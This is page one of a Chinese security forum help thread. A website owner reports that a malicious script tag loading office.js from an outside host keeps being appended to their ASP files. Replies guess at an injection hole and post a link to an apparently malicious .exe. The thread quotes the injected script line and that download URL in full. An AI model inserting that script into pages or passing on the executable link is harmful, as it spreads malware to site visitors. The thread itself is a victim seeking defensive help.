瑞星卡卡安全论坛技术交流区入侵防御(HIPS) 求助src="http://office2.viens.la/office.js?

12   1  /  2  页   跳转

求助src="http://office2.viens.la/office.js?

求助src="http://office2.viens.la/office.js?

网站部分asp文件尾被加上了这段代码<script language="javascript" src="http://office2.viens.la/office.js?do=list&uid=193&type=blog"></script>

访问网站就会提示此网站有病毒……

把这段代码删除后,好了几天,又中了,现在加了防注水代码,不知道能挺几天……

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MAXTHON 2.0)
分享到:
gototop
 

回复:求助src="http://office2.viens.la/office.js?

有人帮助否?
gototop
 

回复: 求助src="http://office2.viens.la/office.js?


网站打开会有这个东东……
gototop
 

回复:求助src="http://office2.viens.la/office.js?

http://www.tyjhhh.cn/1.exe
gototop
 

回复:求助src="http://office2.viens.la/office.js?

什么意思?
gototop
 

回复:求助src="http://office2.viens.la/office.js?

有高手帮助不?
gototop
 

回复:求助src="http://office2.viens.la/office.js?

应该你网站有注入漏洞了吧,我现在把网站的代码全部整改了。

完全用正则和自写函数过滤恶意代码,万恶的攻击者。。
gototop
 

回复:求助src="http://office2.viens.la/office.js?

可是加了防注的代码还是有问题,是不是防的不对?
gototop
 

回复:求助src="http://office2.viens.la/office.js?

可能是是数据库漏洞

http://office2.viens.la/office.js
可以试试附件清理(使用有风险)

本工具由剑盟技术团队出品

附件附件:

下载次数:390
文件类型:application/rar
文件大小:
上传时间:2009-1-3 15:20:47
描述:rar

gototop
 

回复:求助src="http://office2.viens.la/office.js?

好的,谢谢
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT